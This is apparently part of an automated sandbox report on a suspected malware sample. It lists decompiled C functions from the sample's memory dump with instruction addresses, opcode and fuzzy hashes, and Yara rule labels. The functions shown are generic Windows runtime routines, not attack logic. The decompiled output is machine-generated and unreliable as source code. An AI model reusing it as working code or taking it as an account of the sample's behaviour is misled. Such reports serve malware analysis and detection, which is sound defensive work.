                    0x016d7695
                    0x016d7699
                    0x016d76af
                    0x016d76b5
                    0x016d76b7
                    0x016d76b7
                    0x016d76d7
                    0x016d76dc
                    0x00000000
                    0x016d76dc
                    0x016d76a2
                    0x016d76a9
                    0x016d7651
                    0x016d7653
                    0x016d7653
                    0x016d7656
                    0x016d7656
                    0x00000000
                    0x016d7656
                    0x016d7644
                    0x016d7646
                    0x016d7648
                    0x016d7648
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 97c097c871445aae32ecfcb41ee156e3a0645e9808fbb762f51d80910bfff377
                    • Instruction ID: 9e131eb6155a33e94c79ccf695df4249f165c8aea2128981d71c3dcede25cff8
                    • Opcode Fuzzy Hash: 97c097c871445aae32ecfcb41ee156e3a0645e9808fbb762f51d80910bfff377
                    • Instruction Fuzzy Hash: FB318EB1A053518FE720CF1DCC00B26BBE9FB88B04F05496DEA9597351E7B0E804CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0166AA16 Relevance: .1, Instructions: 93COMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E0166AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x175d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1757b9c; // 0x0
					_t53 = L01684620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E016AB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E016AF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01676C59(_t53, _t51, _t58) != 0) {
							_t28 = E01695E50(0x164c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0169B230(_v32, _v28, 0x164c2d8, 1,  &_v24);
								_t28 = E0166F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                    0x0166aa25
                    0x0166aa29
                    0x0166aa2d
                    0x0166aa30
                    0x0166aa37
                    0x0166aa3c
                    0x016c4458
                    0x016c4458
                    0x016c4472
                    0x016c4474
                    0x016c4476
                    0x0166aa64
                    0x0166aa74
                    0x016c447c
                    0x016c4483
                    0x016c4492
                    0x0166aa52
                    0x0166aa54
                    0x0166aa5e
                    0x016c44a8
                    0x016c44ad
                    0x016c44af
                    0x016c44b6
                    0x016c44b6
                    0x016c44b9
                    0x016c44bc
                    0x016c44cd
                    0x016c44d3
                    0x016c44d6
                    0x016c44e1
                    0x016c44e1
                    0x016c44e6
                    0x016c44e8
                    0x016c44fb
                    0x016c44fb
                    0x016c44e8
                    0x00000000
                    0x0166aa5e
                    0x016c4476
                    0x0166aa42
                    0x0166aa46
                    0x0166aa48
                    0x0166aa4c
                    0x00000000
                    0x00000000
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad2184a9693fd6528d484764176f5fea82dcfc378ebd4a301e4f663bd9176439
                    • Instruction ID: dedbf719cf425ef2e583e2e1745ae8c28f9cd1967970ed3655c92b5ddf86ee8b
                    • Opcode Fuzzy Hash: ad2184a9693fd6528d484764176f5fea82dcfc378ebd4a301e4f663bd9176439
                    • Instruction Fuzzy Hash: 2731E571A0021AABCF11EFA9CD51A7FB7B9EF04700B11406EF901E7240EB749D51CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A4A2C Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E016A4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x175d360 ^ _t62;
				_v8 =  *0x175d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01682280(_t26, 0x1758608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0167FFB0(_t41, _t51, 0x1758608);
						L2:
						 *0x175b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E016AB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E01682280(_t28, 0x1758608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0167FFB0(_t42, _t53, 0x1758608);
							if(_t53 != 0) {
								L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0167FFB0(_t41, _t51, 0x1758608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                    0x016a4a2c
                    0x016a4a34
                    0x016a4a3c
                    0x016a4a3e
                    0x016a4a48
                    0x016a4a4b
                    0x016a4a4d
                    0x016a4a51
                    0x016a4a9c
                    0x00000000
                    0x00000000
                    0x016a4aa3
                    0x016a4aa8
                    0x016a4aad
                    0x016a4ab1
                    0x016a4ade
                    0x016a4ae3
                    0x016a4a5a
                    0x016a4a62
                    0x016a4a6a
                    0x016a4a6e
                    0x016df203
                    0x016a4a84
                    0x016a4a88
                    0x016a4a89
                    0x016a4a8a
                    0x016a4a95
                    0x016a4a95
                    0x016a4a79
                    0x016a4a80
                    0x016a4af2
                    0x016a4af4
                    0x016a4af9
                    0x016a4aff
                    0x016a4b01
                    0x016a4b03
                    0x016a4b08
                    0x016df20a
                    0x016df212
                    0x016df216
                    0x016df216
                    0x016a4b08
                    0x016a4b13
                    0x016a4b1a
                    0x016df229
                    0x016df229
                    0x016a4b1a
                    0x016a4a82
                    0x00000000
                    0x016a4a82
                    0x016a4ab7
                    0x016a4acd
                    0x016a4acd
                    0x016a4ad5
                    0x016a4ada
                    0x00000000
                    0x016a4ada
                    0x016a4ac2
                    0x016a4acb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016a4acb
                    0x016a4a53
                    0x016a4a53
                    0x016a4a58
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0524c16f0b9ff3d1ce49c4d87e250c9511b77580586bdf3cad1ef204d1d1f645
                    • Instruction ID: bc4447f1bbcb13a9b810423199deeab72c69d426996f0389b8594366c01bd070
                    • Opcode Fuzzy Hash: 0524c16f0b9ff3d1ce49c4d87e250c9511b77580586bdf3cad1ef204d1d1f645
                    • Instruction Fuzzy Hash: 9231F332201351DBC761AF69CD61B2ABBA5FB80710F88455DEE6607245CBF0DC01CF9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016A8EC7 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E016A8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x175d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E01694E70(0x17586e4, 0x16a9490, 0, 0);
					if( *0x17553e8 > 5 && E016A8F33(0x17553e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x17553e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x17553e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x164bc46;
						_t48 = E016E7B9C(0x17553e8, 0x164bc46, _t67, 0x17553e8, _t70,  &_v140);
					}
				}
				return E016AB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                    0x016a8ec7
                    0x016a8ed9
                    0x016a8edc
                    0x016a8ee6
                    0x016a8ee9
                    0x016a8eee
                    0x016a8efc
                    0x016a8f08
                    0x016e1349
                    0x016e1353
                    0x016e135d
                    0x016e1366
                    0x016e136f
                    0x016e1375
                    0x016e137c
                    0x016e1385
                    0x016e1390
                    0x016e1391
                    0x016e139c
                    0x016e139d
                    0x016e13a6
                    0x016e13ac
                    0x016e13b2
                    0x016e13b5
                    0x016e13bc
                    0x016e13bf
                    0x016e13c2
                    0x016e13c5
                    0x016e13c8
                    0x016e13cb
                    0x016e13ce
                    0x016e13d1
                    0x016e13d4
                    0x016e13d7
                    0x016e13da
                    0x016e13dd
                    0x016e13e0
                    0x016e13e3
                    0x016e13e6
                    0x016e13e9
                    0x016e13f6
                    0x016e1400
                    0x016e1400
                    0x016a8f08
                    0x016a8f32

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ae8fbaff703deef7addb6ecd6e580dc223b7e1d1be6867427d53d5fbf8c8d319
                    • Instruction ID: c59874394f1fa59167a4f0450ff70933142f3afc6005b61a6dcddc2539a66da5
                    • Opcode Fuzzy Hash: ae8fbaff703deef7addb6ecd6e580dc223b7e1d1be6867427d53d5fbf8c8d319
                    • Instruction Fuzzy Hash: 8241A2B1D003189FDB20CFAAD980AADFBF9FB48310F5041AEE509A7201E7745A84CF54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169E730 Relevance: .1, Instructions: 89COMMON
                    Download Yara Rule
                    C-Code - Quality: 74%
                    			E0169E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E016A9670() < 0) {
					L016BDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1757b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L01684620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M0169E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                    0x0169e730
                    0x0169e736
                    0x0169e738
                    0x0169e73d
                    0x0169e73e
                    0x0169e740
                    0x0169e749
                    0x0169e765
                    0x0169e76a
                    0x0169e76b
                    0x0169e76c
                    0x0169e76d
                    0x0169e76e
                    0x0169e76f
                    0x0169e775
                    0x0169e777
                    0x0169e77e
                    0x016db675
                    0x0169e784
                    0x0169e784
                    0x0169e789
                    0x0169e7a8
                    0x0169e7ac
                    0x0169e807
                    0x0169e7ae
                    0x0169e7ae
                    0x0169e7b1
                    0x0169e7b4
                    0x0169e7b9
                    0x0169e7c0
                    0x0169e7c4
                    0x0169e7ca
                    0x0169e7cc
                    0x00000000
                    0x0169e7d3
                    0x0169e7d6
                    0x00000000
                    0x00000000
                    0x0169e7ff
                    0x0169e802
                    0x00000000
                    0x00000000
                    0x0169e7f9
                    0x0169e7fc
                    0x00000000
                    0x00000000
                    0x0169e7f3
                    0x0169e7f6
                    0x00000000
                    0x00000000
                    0x0169e7ed
                    0x0169e7f0
                    0x00000000
                    0x00000000
                    0x0169e7e7
                    0x0169e7ea
                    0x00000000
                    0x00000000
                    0x016db685
                    0x016db688
                    0x00000000
                    0x00000000
                    0x016db682
                    0x00000000
                    0x00000000
                    0x0169e7cc
                    0x0169e7d9
                    0x0169e7dc
                    0x0169e7de
                    0x0169e7de
                    0x0169e7ac
                    0x0169e7e4
                    0x0169e74b
                    0x0169e751
                    0x0169e759
                    0x0169e761
                    0x0169e761

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 20dc9838b15be4f94c241f9eb00315c756f6893c6816e783225cdc8d1c51aaac
                    • Instruction ID: 1c7d19c7c4d57046860d8d0e3ebe63f1c867cedbb591993760916ee202912b82
                    • Opcode Fuzzy Hash: 20dc9838b15be4f94c241f9eb00315c756f6893c6816e783225cdc8d1c51aaac
                    • Instruction Fuzzy Hash: 57316D75A14249EFDB44CF58DC41B9ABBE8FB09314F14826AF904CB341E672ED90CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169BC2C Relevance: .1, Instructions: 88COMMON
                    Download Yara Rule
                    C-Code - Quality: 67%
                    			E0169BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1756100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01682280(0xd, 0x74af1a0);
				_t41 =  *0x17560f8; // 0x0
				if(_t41 != 0) {
					 *0x17560f8 =  *_t41;
					 *0x17560fc =  *0x17560fc + 0xffff;
				}
				E0167FFB0(_t41, 0x800, 0x74af1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x17560f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01684620(0x1756100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1756100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                    0x0169bc36
                    0x0169bc42
                    0x0169bc45
                    0x0169bc4a
                    0x0169bd35
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0169bc50
                    0x0169bc50
                    0x0169bc58
                    0x0169bc5a
                    0x0169bc60
                    0x00000000
                    0x00000000
                    0x016da4f2
                    0x016da4f6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016da4fc
                    0x0169bc79
                    0x0169bc7e
                    0x0169bc86
                    0x0169bd16
                    0x0169bd20
                    0x0169bd20
                    0x0169bc8d
                    0x0169bc94
                    0x0169bcbd
                    0x0169bcca
                    0x0169bccb
                    0x0169bccc
                    0x0169bccd
                    0x0169bcce
                    0x0169bcd4
                    0x0169bcea
                    0x0169bcee
                    0x0169bcf2
                    0x0169bd00
                    0x0169bd04
                    0x00000000
                    0x0169bc96
                    0x0169bcab
                    0x0169bcaf
                    0x0169bd2c
                    0x0169bd2c
                    0x0169bd09
                    0x00000000
                    0x0169bd09
                    0x0169bcb1
                    0x0169bcb5
                    0x0169bcbb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0169bcbb

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 10a09609578943c119dca5711ac51fea54c664ea5f24db19f5220ca75df6e673
                    • Instruction ID: c4dae598c22fb8b397e42a5217c87525516bcb677a3107605b2299f2f2413a83
                    • Opcode Fuzzy Hash: 10a09609578943c119dca5711ac51fea54c664ea5f24db19f5220ca75df6e673
                    • Instruction Fuzzy Hash: 9131D132600656DBDF51EF58E8C0BA677B8FB18321F544079ED48DB205EBB4D94A8B80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01669100 Relevance: .1, Instructions: 87COMMON
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E01669100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x173f6e8);
				E016BD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E017388F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E016BD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x17586c0; // 0x12007b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x17586b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01682280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E017388F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E016AAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x175b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x17584c0;
										if(_t69 >=  *0x17584c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01739063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0166922A(_t82);
							_t53 = E01687D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01738B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x17586c0; // 0x12007b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x17586b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x17586bc;
										_t72 = 0x17586b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01669240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x17586c4;
									_t72 = 0x17586c0;
									L18:
									E01699B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                    0x01669100
                    0x01669100
                    0x01669100
                    0x01669100
                    0x01669102
                    0x01669107
                    0x0166910c
                    0x01669110
                    0x01669115
                    0x01669136
                    0x01669143
                    0x016c37e4
                    0x016c37e4
                    0x01669149
                    0x0166914e
                    0x0166914e
                    0x01669117
                    0x0166911d
                    0x00000000
                    0x00000000
                    0x0166911f
                    0x01669125
                    0x00000000
                    0x01669151
                    0x01669158
                    0x0166915d
                    0x01669161
                    0x01669168
                    0x016c3715
                    0x00000000
                    0x0166916e
                    0x0166916e
                    0x01669175
                    0x01669177
                    0x0166917e
                    0x0166917f
                    0x01669182
                    0x01669182
                    0x01669187
                    0x01669187
                    0x0166918a
                    0x0166918d
                    0x0166918f
                    0x01669192
                    0x01669195
                    0x01669198
                    0x01669198
                    0x01669198
                    0x0166919a
                    0x00000000
                    0x00000000
                    0x016c371f
                    0x016c3721
                    0x016c3727
                    0x016c372f
                    0x016c3733
                    0x016c3735
                    0x016c3738
                    0x016c373b
                    0x016c373d
                    0x016c3740
                    0x00000000
                    0x00000000
                    0x016c3746
                    0x016c3749
                    0x00000000
                    0x00000000
                    0x016c374f
                    0x016c3751
                    0x00000000
                    0x00000000
                    0x016c3757
                    0x016c3759
                    0x016c375c
                    0x016c375c
                    0x016c375e
                    0x016c375e
                    0x016c3761
                    0x016c3764
                    0x00000000
                    0x00000000
                    0x016c3766
                    0x016c3768
                    0x016c37a3
                    0x016c37a3
                    0x016c37a5
                    0x016c37a7
                    0x016c37ad
                    0x016c37b0
                    0x016c37b2
                    0x016c37bc
                    0x016c37c2
                    0x016c37c2
